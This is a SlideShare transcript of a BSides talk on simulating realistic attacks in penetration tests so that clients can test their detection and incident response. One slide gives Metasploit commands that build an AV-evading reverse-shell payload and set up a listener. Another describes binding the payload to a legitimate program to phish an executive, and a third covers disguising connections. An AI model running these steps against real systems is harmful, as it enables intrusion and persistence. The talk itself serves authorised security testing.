SlideShare una empresa de Scribd logo

Simulating Real World Attack

Descargar como KEY, PDF
T
tmacuk

First given at BSidesChicago - this is a talk about simulating attacks in a pen test so that the client can learn to be prepared for a real attack.

Tecnología
1 de 63
Simulating Real World Attacks Thomas Mackenzie
Acknowledgements Chris Nickerson Carlos Perez Simon Whitehouse
Introduction / Scope Are clients aware of attacks happening to them? If they are not, how can we help them? How can we test if they aware of an attack?
Remediation of an Attack Remediation - Step One - Fixing the vulnerability that was exploited Step Two - Dealing with what happened post exploitation
Case Study Lush.co.uk They found out at the end of January about the attack Stated that the attack started “they think” on the 4th October
Case Study cont. Zurich UK Lost 46,000 Customer Records Found out 1 year later Cost £2.28 million in fines - Not to mention fixing
Case Study cont. Chain of events - When did it start? When did it end? What information was available to the attacker? What information was compromised? Not counting - How it happened. How to stop it from happening again.
What am I saying? Yes - If they knew about the vulnerability in the first place they could have stopped this from happening. But they didn’t - The attack happened and it has cost them money to not just fix but to the chain of events stuff too.
Attacks we see Layer 8 (Management) Development Issues 0-Days Passive Actions / Obfuscation Methods
Attacks we see cont. These attacks are what we are seeing at the moment. When we do testing for clients we stop at the vulnerability. We stop at the exploit and we do not carry on.
Attacks we see cont. Stopping at the vulnerability means - The client get to do Step One of remediation What about Step Two?
It is important!!! Without the proper things in place it can take a long time to fix this. Self Detection Law Enforcement Public Detection Regulatory Detection 0 50 100 150 200
Why didn’t they know? There are a lot of things in place at the moment that help people detect attacks / even stop them. IDS / IPS / FW / Logs etc. Attacks are still occurring and we are still hearing about them all the time.
Why didn’t they know? cont. Do we test this in our pen test? How can we test if they are aware of an attack? Certainly not by just exploiting the vulnerability we have to deep dive.
Is it Real? Unless what you do is real your client WILL NOT CARE!
Ask them! Ask them what they care about Why do they care?
The Brand
Employees
Customers
Money
Unless... Unless the attack happens for real they don’t have to deal with the aftermath! Are they prepared?
IR Not all companies have IR teams How long does it take for the attackers trail to be found?
Knowing you have been compromised = good When and how long for = better
Reporting When it comes to the report attack them with simulated examples - examples you could recreate. Could you kill someone? Can you steal money? Can you change / recreate their product?
Report cont. Give a time window / speak to only one person Document everything you do Ask them what they saw you do Compare
Did they know? Did they know you were attacking them If so did they try to stop you? If not why not!
Noise Levels Low - Ninja Hacking Skillz Medium - Make a few mistakes that should be detected High - Scan them to hell and back
Graded Levels Level 1 - 5 Starting at Script Kiddies to Criminal
What are we doing! Attacking systems with real results instead of just giving information they don’t care about.
Methods Low hanging fruit are the first checkpoints Processes, connections, EventLog and in some case memory dumps
Processes Time of creation Parent PID Owner Command Line
Hide! Hide your connections SVCHOST.exe looks normal if connecting to high ports Firefox, Dropbox, AV 80 and 443
Example So what are we actually talking about? How can we go about simulating an attack like what we have just spoken about?
Ask and you shall receive Brief Discuss options for testing What is important to them?
Seek and you will find What was important to them? Are they any exploits / 0-days for that piece of software?
Knock and the door will be opened Simply and easily do not give up There is always going to be some avenue of attack for this client they may just not know about it Look at the following example
Attacking Layer 8 Idiots in the company are your first point of call. Is the CEO an idiot? Skype is important to them - attack them with what is important!
Attacking Layer 8 cont. ./msfpayload windows/meterpreter/reverse_tcp LHOST = x.x.x.x R | ./msfencode -e x86/ shikata_ga_nai -c 5 -t exe -o payload.exe ./msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST x.x.x.x exploit
Attacking Layer 8 cont. Using IExpress you can bind a primary .exe. and your payload together Settings available in IExpress Running that evil .exe (BANG) reverse shell!
Do not leave it there! What did I say at the beginning? Once you have shell do something with it so that it actually means something to them Delete data / change data / get addresses / create ways to stay there!
But WAIT!!! POLITICS! You cannot just delete data without permission! Make sure you find out what you can do!
If you can delete... You most likely can add
What is better?
What is better?
This?
What is better?
What is better?
This?
WHAT IS ALL THIS! By simulating theses attacks the way I am talking about the client can then see exactly what they would need to do if it was a real attack!
Future @sponex and I are creating a website about this and some guides that link to some good methodologies out there.
Summary Attack them, don’t pussy foot around! Find out what they care about. Make them realise how hard it would be to fix.
:~$ whoami Director of upSploit Limited Soon to be Web Application Security Consultant for Trustwave British Student Podcaster
Questions thomas@tmacuk.co.uk www.tmacuk.co.uk / @tmacuk www.upsploit.com / @upsploit

Recomendados

How long until we become Mr Potato Head?
How long until we become Mr Potato Head?How long until we become Mr Potato Head?
How long until we become Mr Potato Head?Jerri Howlett
 
Marc Recommendations For Parents
Marc Recommendations For ParentsMarc Recommendations For Parents
Marc Recommendations For ParentsDover Sherborn High School
 
UX Sofia 2011 - Conrad Albrecht-Buehler
UX Sofia 2011 - Conrad Albrecht-BuehlerUX Sofia 2011 - Conrad Albrecht-Buehler
UX Sofia 2011 - Conrad Albrecht-BuehlerLucrat
 
Effective feedback design
Effective feedback designEffective feedback design
Effective feedback designHarshal Patil
 
Cyber bullying
Cyber bullying Cyber bullying
Cyber bullying jun ijan
 
Управление рисками: как перестать верить в иллюзии
Управление рисками: как перестать верить в иллюзииУправление рисками: как перестать верить в иллюзии
Управление рисками: как перестать верить в иллюзииPositive Hack Days
 
SafetyCoach_Five Critical Mistakes Safety Professionals Make
SafetyCoach_Five Critical Mistakes Safety Professionals MakeSafetyCoach_Five Critical Mistakes Safety Professionals Make
SafetyCoach_Five Critical Mistakes Safety Professionals MakeIan Collins
 
Connect with Care
Connect with CareConnect with Care
Connect with CareWashington Trafficking Prevention
 

Recomendados

How long until we become Mr Potato Head?
How long until we become Mr Potato Head?How long until we become Mr Potato Head?
How long until we become Mr Potato Head?Jerri Howlett
 
Marc Recommendations For Parents
Marc Recommendations For ParentsMarc Recommendations For Parents
Marc Recommendations For ParentsDover Sherborn High School
 
UX Sofia 2011 - Conrad Albrecht-Buehler
UX Sofia 2011 - Conrad Albrecht-BuehlerUX Sofia 2011 - Conrad Albrecht-Buehler
UX Sofia 2011 - Conrad Albrecht-BuehlerLucrat
 
Effective feedback design
Effective feedback designEffective feedback design
Effective feedback designHarshal Patil
 
Cyber bullying
Cyber bullying Cyber bullying
Cyber bullying jun ijan
 
Управление рисками: как перестать верить в иллюзии
Управление рисками: как перестать верить в иллюзииУправление рисками: как перестать верить в иллюзии
Управление рисками: как перестать верить в иллюзииPositive Hack Days
 
SafetyCoach_Five Critical Mistakes Safety Professionals Make
SafetyCoach_Five Critical Mistakes Safety Professionals MakeSafetyCoach_Five Critical Mistakes Safety Professionals Make
SafetyCoach_Five Critical Mistakes Safety Professionals MakeIan Collins
 
Connect with Care
Connect with CareConnect with Care
Connect with CareWashington Trafficking Prevention
 
Congratulations! You're The New Security Person! (or, I've Made a Huge Mistake)
Congratulations! You're The New Security Person! (or, I've Made a Huge Mistake)Congratulations! You're The New Security Person! (or, I've Made a Huge Mistake)
Congratulations! You're The New Security Person! (or, I've Made a Huge Mistake)Sean Jackson
 
Opsec for security researchers
Opsec for security researchersOpsec for security researchers
Opsec for security researchersvicenteDiaz_KL
 
Security crashcourse openwest_2019
Security crashcourse openwest_2019Security crashcourse openwest_2019
Security crashcourse openwest_2019Sean Jackson
 
Red Team Operations: Attack and Think Like a Criminal
Red Team Operations: Attack and Think Like a CriminalRed Team Operations: Attack and Think Like a Criminal
Red Team Operations: Attack and Think Like a CriminalInfosec
 
You Can't Buy Security - DerbyCon 2012
You Can't Buy Security - DerbyCon 2012You Can't Buy Security - DerbyCon 2012
You Can't Buy Security - DerbyCon 2012jadedsecurity
 
2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference 2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference Rea & Associates
 
The Open Group San Diego Panel Explores Global Cybersecurity Issues for Impro...
The Open Group San Diego Panel Explores Global Cybersecurity Issues for Impro...The Open Group San Diego Panel Explores Global Cybersecurity Issues for Impro...
The Open Group San Diego Panel Explores Global Cybersecurity Issues for Impro...Dana Gardner
 
New text document
New text documentNew text document
New text documentsleucwnq
 
New text document
New text documentNew text document
New text documentsleucwnq
 
[cb22] Keynote: Underwhelmed: Making Sense of the Overwhelming Challenge of C...
[cb22] Keynote: Underwhelmed: Making Sense of the Overwhelming Challenge of C...[cb22] Keynote: Underwhelmed: Making Sense of the Overwhelming Challenge of C...
[cb22] Keynote: Underwhelmed: Making Sense of the Overwhelming Challenge of C...CODE BLUE
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskRob Ragan
 
Champaign EDC Cybersecurity Seminar by John Bambenek - March 25, 2014
Champaign EDC Cybersecurity Seminar by John Bambenek - March 25, 2014Champaign EDC Cybersecurity Seminar by John Bambenek - March 25, 2014
Champaign EDC Cybersecurity Seminar by John Bambenek - March 25, 2014John Bambenek
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Converge ppt
Converge pptConverge ppt
Converge pptDavid Trollman
 
Cybersecurity in 2016
Cybersecurity in 2016Cybersecurity in 2016
Cybersecurity in 2016Ben Finke
 
User Interfaces and Algorithms for Fighting Phishing, Cylab Seminar talk 2007
User Interfaces and Algorithms for Fighting Phishing, Cylab Seminar talk 2007User Interfaces and Algorithms for Fighting Phishing, Cylab Seminar talk 2007
User Interfaces and Algorithms for Fighting Phishing, Cylab Seminar talk 2007Jason Hong
 
React Faster and Better: New Approaches for Advanced Incident Response
React Faster and Better: New Approaches for Advanced Incident ResponseReact Faster and Better: New Approaches for Advanced Incident Response
React Faster and Better: New Approaches for Advanced Incident ResponseSilvioPappalardo
 
11 19-2015 - iasaca membership conference - the state of security
11 19-2015 - iasaca membership conference - the state of security11 19-2015 - iasaca membership conference - the state of security
11 19-2015 - iasaca membership conference - the state of securityMatthew Pascucci
 
Defcon23 Talk Classify Targets To Make Social Engineering Easier To Achieve
Defcon23 Talk Classify Targets To Make Social Engineering Easier To AchieveDefcon23 Talk Classify Targets To Make Social Engineering Easier To Achieve
Defcon23 Talk Classify Targets To Make Social Engineering Easier To AchieveHeng Guan
 
sophos-four-key-tips-from-incident-response-experts.pdf
sophos-four-key-tips-from-incident-response-experts.pdfsophos-four-key-tips-from-incident-response-experts.pdf
sophos-four-key-tips-from-incident-response-experts.pdfDennis Reyes
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 

Más contenido relacionado

Similar a Simulating Real World Attack

Congratulations! You're The New Security Person! (or, I've Made a Huge Mistake)
Congratulations! You're The New Security Person! (or, I've Made a Huge Mistake)Congratulations! You're The New Security Person! (or, I've Made a Huge Mistake)
Congratulations! You're The New Security Person! (or, I've Made a Huge Mistake)Sean Jackson
 
Opsec for security researchers
Opsec for security researchersOpsec for security researchers
Opsec for security researchersvicenteDiaz_KL
 
Security crashcourse openwest_2019
Security crashcourse openwest_2019Security crashcourse openwest_2019
Security crashcourse openwest_2019Sean Jackson
 
Red Team Operations: Attack and Think Like a Criminal
Red Team Operations: Attack and Think Like a CriminalRed Team Operations: Attack and Think Like a Criminal
Red Team Operations: Attack and Think Like a CriminalInfosec
 
You Can't Buy Security - DerbyCon 2012
You Can't Buy Security - DerbyCon 2012You Can't Buy Security - DerbyCon 2012
You Can't Buy Security - DerbyCon 2012jadedsecurity
 
2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference 2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference Rea & Associates
 
The Open Group San Diego Panel Explores Global Cybersecurity Issues for Impro...
The Open Group San Diego Panel Explores Global Cybersecurity Issues for Impro...The Open Group San Diego Panel Explores Global Cybersecurity Issues for Impro...
The Open Group San Diego Panel Explores Global Cybersecurity Issues for Impro...Dana Gardner
 
New text document
New text documentNew text document
New text documentsleucwnq
 
New text document
New text documentNew text document
New text documentsleucwnq
 
[cb22] Keynote: Underwhelmed: Making Sense of the Overwhelming Challenge of C...
[cb22] Keynote: Underwhelmed: Making Sense of the Overwhelming Challenge of C...[cb22] Keynote: Underwhelmed: Making Sense of the Overwhelming Challenge of C...
[cb22] Keynote: Underwhelmed: Making Sense of the Overwhelming Challenge of C...CODE BLUE
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskRob Ragan
 
Champaign EDC Cybersecurity Seminar by John Bambenek - March 25, 2014
Champaign EDC Cybersecurity Seminar by John Bambenek - March 25, 2014Champaign EDC Cybersecurity Seminar by John Bambenek - March 25, 2014
Champaign EDC Cybersecurity Seminar by John Bambenek - March 25, 2014John Bambenek
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Cybersecurity in 2016
Cybersecurity in 2016Cybersecurity in 2016
Cybersecurity in 2016Ben Finke
 
User Interfaces and Algorithms for Fighting Phishing, Cylab Seminar talk 2007
User Interfaces and Algorithms for Fighting Phishing, Cylab Seminar talk 2007User Interfaces and Algorithms for Fighting Phishing, Cylab Seminar talk 2007
User Interfaces and Algorithms for Fighting Phishing, Cylab Seminar talk 2007Jason Hong
 
React Faster and Better: New Approaches for Advanced Incident Response
React Faster and Better: New Approaches for Advanced Incident ResponseReact Faster and Better: New Approaches for Advanced Incident Response
React Faster and Better: New Approaches for Advanced Incident ResponseSilvioPappalardo
 
11 19-2015 - iasaca membership conference - the state of security
11 19-2015 - iasaca membership conference - the state of security11 19-2015 - iasaca membership conference - the state of security
11 19-2015 - iasaca membership conference - the state of securityMatthew Pascucci
 
Defcon23 Talk Classify Targets To Make Social Engineering Easier To Achieve
Defcon23 Talk Classify Targets To Make Social Engineering Easier To AchieveDefcon23 Talk Classify Targets To Make Social Engineering Easier To Achieve
Defcon23 Talk Classify Targets To Make Social Engineering Easier To AchieveHeng Guan
 
sophos-four-key-tips-from-incident-response-experts.pdf
sophos-four-key-tips-from-incident-response-experts.pdfsophos-four-key-tips-from-incident-response-experts.pdf
sophos-four-key-tips-from-incident-response-experts.pdfDennis Reyes
 

Similar a Simulating Real World Attack (20)

Congratulations! You're The New Security Person! (or, I've Made a Huge Mistake)
Congratulations! You're The New Security Person! (or, I've Made a Huge Mistake)Congratulations! You're The New Security Person! (or, I've Made a Huge Mistake)
Congratulations! You're The New Security Person! (or, I've Made a Huge Mistake)
 
Opsec for security researchers
Opsec for security researchersOpsec for security researchers
Opsec for security researchers
 
Security crashcourse openwest_2019
Security crashcourse openwest_2019Security crashcourse openwest_2019
Security crashcourse openwest_2019
 
Red Team Operations: Attack and Think Like a Criminal
Red Team Operations: Attack and Think Like a CriminalRed Team Operations: Attack and Think Like a Criminal
Red Team Operations: Attack and Think Like a Criminal
 
You Can't Buy Security - DerbyCon 2012
You Can't Buy Security - DerbyCon 2012You Can't Buy Security - DerbyCon 2012
You Can't Buy Security - DerbyCon 2012
 
2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference 2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference
 
The Open Group San Diego Panel Explores Global Cybersecurity Issues for Impro...
The Open Group San Diego Panel Explores Global Cybersecurity Issues for Impro...The Open Group San Diego Panel Explores Global Cybersecurity Issues for Impro...
The Open Group San Diego Panel Explores Global Cybersecurity Issues for Impro...
 
New text document
New text documentNew text document
New text document
 
New text document
New text documentNew text document
New text document
 
[cb22] Keynote: Underwhelmed: Making Sense of the Overwhelming Challenge of C...
[cb22] Keynote: Underwhelmed: Making Sense of the Overwhelming Challenge of C...[cb22] Keynote: Underwhelmed: Making Sense of the Overwhelming Challenge of C...
[cb22] Keynote: Underwhelmed: Making Sense of the Overwhelming Challenge of C...
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
 
Champaign EDC Cybersecurity Seminar by John Bambenek - March 25, 2014
Champaign EDC Cybersecurity Seminar by John Bambenek - March 25, 2014Champaign EDC Cybersecurity Seminar by John Bambenek - March 25, 2014
Champaign EDC Cybersecurity Seminar by John Bambenek - March 25, 2014
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?
 
Converge ppt
Converge pptConverge ppt
Converge ppt
 
Cybersecurity in 2016
Cybersecurity in 2016Cybersecurity in 2016
Cybersecurity in 2016
 
User Interfaces and Algorithms for Fighting Phishing, Cylab Seminar talk 2007
User Interfaces and Algorithms for Fighting Phishing, Cylab Seminar talk 2007User Interfaces and Algorithms for Fighting Phishing, Cylab Seminar talk 2007
User Interfaces and Algorithms for Fighting Phishing, Cylab Seminar talk 2007
 
React Faster and Better: New Approaches for Advanced Incident Response
React Faster and Better: New Approaches for Advanced Incident ResponseReact Faster and Better: New Approaches for Advanced Incident Response
React Faster and Better: New Approaches for Advanced Incident Response
 
11 19-2015 - iasaca membership conference - the state of security
11 19-2015 - iasaca membership conference - the state of security11 19-2015 - iasaca membership conference - the state of security
11 19-2015 - iasaca membership conference - the state of security
 
Defcon23 Talk Classify Targets To Make Social Engineering Easier To Achieve
Defcon23 Talk Classify Targets To Make Social Engineering Easier To AchieveDefcon23 Talk Classify Targets To Make Social Engineering Easier To Achieve
Defcon23 Talk Classify Targets To Make Social Engineering Easier To Achieve
 
sophos-four-key-tips-from-incident-response-experts.pdf
sophos-four-key-tips-from-incident-response-experts.pdfsophos-four-key-tips-from-incident-response-experts.pdf
sophos-four-key-tips-from-incident-response-experts.pdf
 

Último

Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Angeliki Cooney
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 

Último (20)

Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 

Simulating Real World Attack

  • 1. Simulating Real World Attacks Thomas Mackenzie
  • 3. Introduction / Scope Are clients aware of attacks happening to them? If they are not, how can we help them? How can we test if they aware of an attack?
  • 4. Remediation of an Attack Remediation - Step One - Fixing the vulnerability that was exploited Step Two - Dealing with what happened post exploitation
  • 5. Case Study Lush.co.uk They found out at the end of January about the attack Stated that the attack started “they think” on the 4th October
  • 6. Case Study cont. Zurich UK Lost 46,000 Customer Records Found out 1 year later Cost £2.28 million in fines - Not to mention fixing
  • 7. Case Study cont. Chain of events - When did it start? When did it end? What information was available to the attacker? What information was compromised? Not counting - How it happened. How to stop it from happening again.
  • 8. What am I saying? Yes - If they knew about the vulnerability in the first place they could have stopped this from happening. But they didn’t - The attack happened and it has cost them money to not just fix but to the chain of events stuff too.
  • 9. Attacks we see Layer 8 (Management) Development Issues 0-Days Passive Actions / Obfuscation Methods
  • 10. Attacks we see cont. These attacks are what we are seeing at the moment. When we do testing for clients we stop at the vulnerability. We stop at the exploit and we do not carry on.
  • 11. Attacks we see cont. Stopping at the vulnerability means - The client get to do Step One of remediation What about Step Two?
  • 12. It is important!!! Without the proper things in place it can take a long time to fix this. Self Detection Law Enforcement Public Detection Regulatory Detection 0 50 100 150 200
  • 13. Why didn’t they know? There are a lot of things in place at the moment that help people detect attacks / even stop them. IDS / IPS / FW / Logs etc. Attacks are still occurring and we are still hearing about them all the time.
  • 14. Why didn’t they know? cont. Do we test this in our pen test? How can we test if they are aware of an attack? Certainly not by just exploiting the vulnerability we have to deep dive.
  • 15. Is it Real? Unless what you do is real your client WILL NOT CARE!
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25. Ask them! Ask them what they care about Why do they care?
  • 29. Money
  • 30. Unless... Unless the attack happens for real they don’t have to deal with the aftermath! Are they prepared?
